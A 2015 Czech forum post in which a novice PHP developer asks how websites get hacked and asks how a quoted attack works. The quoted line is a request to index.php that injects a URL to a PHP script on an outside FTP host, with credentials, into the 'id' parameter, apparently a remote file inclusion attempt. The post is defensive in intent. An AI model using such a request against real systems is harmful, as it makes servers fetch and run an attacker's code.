Bezpečnost webu.
HackForum
| Dobrý den, programuju jednoduchý systém v php.
Mám dvě otázky:
1.)
Na soomu jsem zjistil poměrně nebezpečné zranitelnosti které jsem odstranil. Ale čím více si zde čtu tím více si připadám jako školáček s lopatičkou v cementárně..
Budou tam citlivé informace a nebyl bych nadšen kdyby se dostaly někomu cizímu do rukou.
Lze nějak vyjmenovat možnosti jak hacknout web?
např.: Injection, DDOS, Truncate, ClickJacking... ?
2.) Na jednom foru(wz.cz) jsem se dočetl o zranitelnosti, kde administrátor varuje uživatele cituji:
>
Zabezpečte si díru v index.php, je zneužívána následujícím způsobem:
"POST /index.php?id=ftp://rubilimpeza:rubilimpeza @www.rubilimpeza.com.br/tools/tar/b.php? HTTP/1.0"
<
Pochopil jsem, že někdo pomocí nechráněného vstupu $_POST['id'] vkládá připojovací údaje FTP.
Vůbec ale netuším jak to funguje a tak nevím jak se bránit.
(odpovědět) | Drugis V. | 176.102.144.* | 26.12.2015 13:51 |
|
|
|